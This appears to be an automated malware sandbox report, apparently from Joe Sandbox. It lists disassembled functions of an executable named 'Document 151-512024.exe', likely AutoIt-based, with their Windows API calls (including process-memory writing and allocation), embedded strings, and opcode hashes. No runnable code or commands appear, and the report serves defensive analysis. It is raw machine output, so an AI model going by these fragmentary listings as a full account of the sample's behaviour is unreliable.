                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseHandle
                                                                                                    • String ID:
                                                                                                    • API String ID: 2962429428-0
                                                                                                    • Opcode ID: c2478b6efb8f61e18d0933d86185e6e884db5f3a1d7dabbae473c39cdc510984
                                                                                                    • Instruction ID: a3ebb98c807ad901bd45e294b043facebbf51a80316fbe712a73bc81a31738ef
                                                                                                    • Opcode Fuzzy Hash: c2478b6efb8f61e18d0933d86185e6e884db5f3a1d7dabbae473c39cdc510984
                                                                                                    • Instruction Fuzzy Hash: 3201EE72800B058FCB30AF66D980843FBF9BFA03253048A3FD19652930C3B0A988CF80
                                                                                                    APIs
                                                                                                    • _free.LIBCMT ref: 0097D752
                                                                                                      • Part of subcall function 009729C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0097D7D1,00000000,00000000,00000000,00000000,?,0097D7F8,00000000,00000007,00000000,?,0097DBF5,00000000), ref: 009729DE
                                                                                                      • Part of subcall function 009729C8: GetLastError.KERNEL32(00000000,?,0097D7D1,00000000,00000000,00000000,00000000,?,0097D7F8,00000000,00000007,00000000,?,0097DBF5,00000000,00000000), ref: 009729F0
                                                                                                    • _free.LIBCMT ref: 0097D764
                                                                                                    • _free.LIBCMT ref: 0097D776
                                                                                                    • _free.LIBCMT ref: 0097D788
                                                                                                    • _free.LIBCMT ref: 0097D79A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 776569668-0
                                                                                                    • Opcode ID: 2b7906bcfa12e545ed2f84cb993397a70e34647feee2edac824bec9b6620b322
                                                                                                    • Instruction ID: 4a7f2ca0e680683be2d85b2373c35696b82195cd7a4db5d21fc2430046ebb6d5
                                                                                                    • Opcode Fuzzy Hash: 2b7906bcfa12e545ed2f84cb993397a70e34647feee2edac824bec9b6620b322
                                                                                                    • Instruction Fuzzy Hash: F7F01273555208ABC625EBB8FAC6D16B7EDBF84720F988905F14DE7542C730FC828664
                                                                                                    APIs
                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 009A5C58
                                                                                                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 009A5C6F
                                                                                                    • MessageBeep.USER32(00000000), ref: 009A5C87
                                                                                                    • KillTimer.USER32(?,0000040A), ref: 009A5CA3
                                                                                                    • EndDialog.USER32(?,00000001), ref: 009A5CBD
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 3741023627-0
                                                                                                    • Opcode ID: 6e07f2be538f4bb46b6f2d4b52879d744ed6d47c81ffaecd55f56807a47275e5
                                                                                                    • Instruction ID: bfcbf6c49b026ea0f9e860e504d78eb9cf31ba63d7d1b5790ef3f682dff7b575
                                                                                                    • Opcode Fuzzy Hash: 6e07f2be538f4bb46b6f2d4b52879d744ed6d47c81ffaecd55f56807a47275e5
                                                                                                    • Instruction Fuzzy Hash: C301D1B0644B05ABEB205B10ED4EFA677B8FB01B05F01065AA683A10E0DBF4A984DA90
                                                                                                    APIs
                                                                                                    • _free.LIBCMT ref: 009722BE
                                                                                                      • Part of subcall function 009729C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0097D7D1,00000000,00000000,00000000,00000000,?,0097D7F8,00000000,00000007,00000000,?,0097DBF5,00000000), ref: 009729DE
                                                                                                      • Part of subcall function 009729C8: GetLastError.KERNEL32(00000000,?,0097D7D1,00000000,00000000,00000000,00000000,?,0097D7F8,00000000,00000007,00000000,?,0097DBF5,00000000,00000000), ref: 009729F0
                                                                                                    • _free.LIBCMT ref: 009722D0
                                                                                                    • _free.LIBCMT ref: 009722E3
                                                                                                    • _free.LIBCMT ref: 009722F4
                                                                                                    • _free.LIBCMT ref: 00972305
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 776569668-0
                                                                                                    • Opcode ID: f9f053deb6e479cba71efc9e353363eeff9932c9347d29a84226078ca3d23885
                                                                                                    • Instruction ID: 59c287e5dcfea3716650e16d0f41ae68117d7cde2a43e019056fa895786886a2
                                                                                                    • Opcode Fuzzy Hash: f9f053deb6e479cba71efc9e353363eeff9932c9347d29a84226078ca3d23885
                                                                                                    • Instruction Fuzzy Hash: F3F030724111108BC712EFE8BD02DC87B68B718760B05C656F518D62B1C77504939FE4
                                                                                                    APIs
                                                                                                    • EndPath.GDI32(?), ref: 009595D4
                                                                                                    • StrokeAndFillPath.GDI32(?,?,009971F7,00000000,?,?,?), ref: 009595F0
                                                                                                    • SelectObject.GDI32(?,00000000), ref: 00959603
                                                                                                    • DeleteObject.GDI32 ref: 00959616
                                                                                                    • StrokePath.GDI32(?), ref: 00959631
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                    • String ID:
                                                                                                    • API String ID: 2625713937-0
                                                                                                    • Opcode ID: e6ca9b9147ac50dda27ca251a15f6ee669aaa8cdb32b442b90da95550482f179
                                                                                                    • Instruction ID: f0bce8d1db72e22cc12a5ef518c90a4d1aad22b12ccfa36043f328c5f4985dba
                                                                                                    • Opcode Fuzzy Hash: e6ca9b9147ac50dda27ca251a15f6ee669aaa8cdb32b442b90da95550482f179
                                                                                                    • Instruction Fuzzy Hash: B2F03C7004A305EBEB12DFA6ED1C7A43B65AB01323F44C215FA75550F0C73089AAEF20
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __freea$_free
                                                                                                    • String ID: a/p$am/pm
                                                                                                    • API String ID: 3432400110-3206640213
                                                                                                    • Opcode ID: 8f21f1c4079d6700b6c1305e6e27b26ffec1075eab3dab1b01b992aa9ae32c85
                                                                                                    • Instruction ID: 19a79d140b039c77ba68821db9577e7e5d1042b98b0d7dcfd5833a80d776351b
                                                                                                    • Opcode Fuzzy Hash: 8f21f1c4079d6700b6c1305e6e27b26ffec1075eab3dab1b01b992aa9ae32c85
                                                                                                    • Instruction Fuzzy Hash: 1CD1F233904206CBDB289F6CC895BFAB7B8FF45700F28C559E919AB651D3399D80CB91
                                                                                                    APIs
                                                                                                      • Part of subcall function 00960242: EnterCriticalSection.KERNEL32(00A1070C,00A11884,?,?,0095198B,00A12518,?,?,?,009412F9,00000000), ref: 0096024D
                                                                                                      • Part of subcall function 00960242: LeaveCriticalSection.KERNEL32(00A1070C,?,0095198B,00A12518,?,?,?,009412F9,00000000), ref: 0096028A
                                                                                                      • Part of subcall function 00949CB3: _wcslen.LIBCMT ref: 00949CBD
                                                                                                      • Part of subcall function 009600A3: __onexit.LIBCMT ref: 009600A9
                                                                                                    • __Init_thread_footer.LIBCMT ref: 009C7BFB
                                                                                                      • Part of subcall function 009601F8: EnterCriticalSection.KERNEL32(00A1070C,?,?,00958747,00A12514), ref: 00960202
                                                                                                      • Part of subcall function 009601F8: LeaveCriticalSection.KERNEL32(00A1070C,?,00958747,00A12514), ref: 00960235
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                                                                                    • String ID: 5$G$Variable must be of type 'Object'.
                                                                                                    • API String ID: 535116098-3733170431
                                                                                                    • Opcode ID: 90a57fb26cbc6d7523e9b1cd39c970cbdb319a052e52acd66b19b0e31c256d76
                                                                                                    • Instruction ID: fe0fca585a83dcbeebb65549d6e1b714493e4cefae6ffd4ca924b2a1b3b835d0
                                                                                                    • Opcode Fuzzy Hash: 90a57fb26cbc6d7523e9b1cd39c970cbdb319a052e52acd66b19b0e31c256d76
                                                                                                    • Instruction Fuzzy Hash: 53916970A04209AFCB14EF94D991EADB7B5BF88300F10845DF8469B392DB71AE85CF52
                                                                                                    APIs
                                                                                                      • Part of subcall function 009AB403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,009A21D0,?,?,00000034,00000800,?,00000034), ref: 009AB42D
                                                                                                    • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 009A2760
                                                                                                      • Part of subcall function 009AB3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,009A21FF,?,?,00000800,?,00001073,00000000,?,?), ref: 009AB3F8
                                                                                                      • Part of subcall function 009AB32A: GetWindowThreadProcessId.USER32(?,?), ref: 009AB355
                                                                                                      • Part of subcall function 009AB32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,009A2194,00000034,?,?,00001004,00000000,00000000), ref: 009AB365
                                                                                                      • Part of subcall function 009AB32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,009A2194,00000034,?,?,00001004,00000000,00000000), ref: 009AB37B
                                                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 009A27CD
                                                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 009A281A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                    • String ID: @
                                                                                                    • API String ID: 4150878124-2766056989
                                                                                                    • Opcode ID: 36397b58ac5778d97d3305c136684f3450cb998d25e2f4beb25ebdb9ffa98ab4
                                                                                                    • Instruction ID: d0c01cd4739d06e57030b0f4b5af3e9eda8aa937d8e4459784b62fcb1c4b57bc
                                                                                                    • Opcode Fuzzy Hash: 36397b58ac5778d97d3305c136684f3450cb998d25e2f4beb25ebdb9ffa98ab4
                                                                                                    • Instruction Fuzzy Hash: 88413C72901218AFDB10DFA8CD41BEEBBB8EF4A300F104095FA55B7191DB706E85CBA0
                                                                                                    APIs
                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Document 151-512024.exe,00000104), ref: 00971769
                                                                                                    • _free.LIBCMT ref: 00971834
                                                                                                    • _free.LIBCMT ref: 0097183E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$FileModuleName
                                                                                                    • String ID: C:\Users\user\Desktop\Document 151-512024.exe
                                                                                                    • API String ID: 2506810119-3057287820
                                                                                                    • Opcode ID: 587ff40f68ec599e0b67ed2debfceb7cc3eb75b8fa589953f1f5f1f889ae0a5f
                                                                                                    • Instruction ID: cfb714b44ed1099ae25ac5bbe4f6412a89f6f3e498dba5e6035a8f490b4cfe0d
                                                                                                    • Opcode Fuzzy Hash: 587ff40f68ec599e0b67ed2debfceb7cc3eb75b8fa589953f1f5f1f889ae0a5f
                                                                                                    • Instruction Fuzzy Hash: EE316E72A04218AFDB25DF99D885EDEBBFCEB85310F148166F908D7211D6B08E41CB91
                                                                                                    APIs
                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,009DCC08,00000000,?,?,?,?), ref: 009D44AA
                                                                                                    • GetWindowLongW.USER32 ref: 009D44C7
                                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 009D44D7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Long
                                                                                                    • String ID: SysTreeView32
                                                                                                    • API String ID: 847901565-1698111956
                                                                                                    • Opcode ID: 9194b299f0d0c7b0bd0c07bf91bedb2c06b88d0f9414ad28f20c7b2498602d3c
                                                                                                    • Instruction ID: 100f25a8c753dd923009298fbc3d33cb6c9f24a372d7f7cb15ea4f9d09819a4c
                                                                                                    • Opcode Fuzzy Hash: 9194b299f0d0c7b0bd0c07bf91bedb2c06b88d0f9414ad28f20c7b2498602d3c
                                                                                                    • Instruction Fuzzy Hash: A5319E71294606AFDF208F78DC45BEA77A9EB49334F208716F975922E0D770EC909B50
                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 009D461F
                                                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 009D4634
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend
                                                                                                    • String ID: '$0n
                                                                                                    • API String ID: 3850602802-94391585
                                                                                                    • Opcode ID: 43ae264e741ae8c251f4ce68a2fcb69d20bddee3d35c07ce38ac87541b54d14e
                                                                                                    • Instruction ID: 9690ceb82906a88f5f5b27d988d85f207cb72a665f538812f73b89dc9a45556d
                                                                                                    • Opcode Fuzzy Hash: 43ae264e741ae8c251f4ce68a2fcb69d20bddee3d35c07ce38ac87541b54d14e
                                                                                                    • Instruction Fuzzy Hash: BF310474A4120A9FDB14CFA9D991BDABBB9FB49300F14806AE905AB391D770E941CF90
                                                                                                    APIs
                                                                                                    • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 009833A2
                                                                                                      • Part of subcall function 00946B57: _wcslen.LIBCMT ref: 00946B6A
                                                                                                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00943A04
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: IconLoadNotifyShell_String_wcslen
                                                                                                    • String ID: Line: $(A
                                                                                                    • API String ID: 2289894680-329646607
                                                                                                    • Opcode ID: 2d6652f07bf692f688a278de6da32c7f7cb991cf15c404d0df7ffeccff00553e
                                                                                                    • Instruction ID: fb9b8fbc227c9b5e2a14735ec0fd5113bfbb677b283b62797702995bb8e62afc
                                                                                                    • Opcode Fuzzy Hash: 2d6652f07bf692f688a278de6da32c7f7cb991cf15c404d0df7ffeccff00553e
                                                                                                    • Instruction Fuzzy Hash: 5B31C171448300AAD725EB70DC45FEBB7ECAF81710F10892AF5A986291EB749A49C7C3
                                                                                                    APIs
                                                                                                      • Part of subcall function 009C335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,009C3077,?,?), ref: 009C3378
                                                                                                    • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 009C307A
                                                                                                    • _wcslen.LIBCMT ref: 009C309B
                                                                                                    • htons.WSOCK32(00000000,?,?,00000000), ref: 009C3106
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                                                                    • String ID: 255.255.255.255
                                                                                                    • API String ID: 946324512-2422070025
                                                                                                    • Opcode ID: 64b915a64928b1cc9e829e48a70d053e364ca4d127333c68cbd28bc1981b6a38
                                                                                                    • Instruction ID: b8bc9708d4a4154d6ba7d0553f4773ae4e3137a738e42752c330ebb71b44ee4c
                                                                                                    • Opcode Fuzzy Hash: 64b915a64928b1cc9e829e48a70d053e364ca4d127333c68cbd28bc1981b6a38
                                                                                                    • Instruction Fuzzy Hash: AA31E436A042059FCB10CF69C585FAA77E4EF54318F28C05DE9168B392DB32EE41C762
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen
                                                                                                    • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                    • API String ID: 176396367-2734436370
                                                                                                    • Opcode ID: ca1d4019ba07d3da7f733852ad1764681a62640c697b383a0d7bc3de50bf3f5f
                                                                                                    • Instruction ID: a57a3396620be24acfb0b02454e99ba62356d34fd5488ec4c3fb86b5fe18029d
                                                                                                    • Opcode Fuzzy Hash: ca1d4019ba07d3da7f733852ad1764681a62640c697b383a0d7bc3de50bf3f5f
                                                                                                    • Instruction Fuzzy Hash: 8921353260421066D331BA259C17FBBB39CBFD2310F108426F94A9B181EB55AD55C2D5
                                                                                                    APIs
                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 009B4A08
                                                                                                    • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 009B4A5C
                                                                                                    • SetErrorMode.KERNEL32(00000000,?,?,009DCC08), ref: 009B4AD0
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorMode$InformationVolume
                                                                                                    • String ID: %lu
                                                                                                    • API String ID: 2507767853-685833217
                                                                                                    • Opcode ID: c4420174323c6b7d8fe6437076bffe9dc13880f487bfcb67083b0aca9a212226
                                                                                                    • Instruction ID: 5d52b44e94b7d59fb685dc1c1bd9ff09652c135e5e995ef261ac546d34f05adc
                                                                                                    • Opcode Fuzzy Hash: c4420174323c6b7d8fe6437076bffe9dc13880f487bfcb67083b0aca9a212226
                                                                                                    • Instruction Fuzzy Hash: 7A318E70A40109AFDB10DF64C985EAA7BF8EF48318F1480A5F909DB252D771ED46DB61
                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 009D424F
                                                                                                    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 009D4264
                                                                                                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 009D4271
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
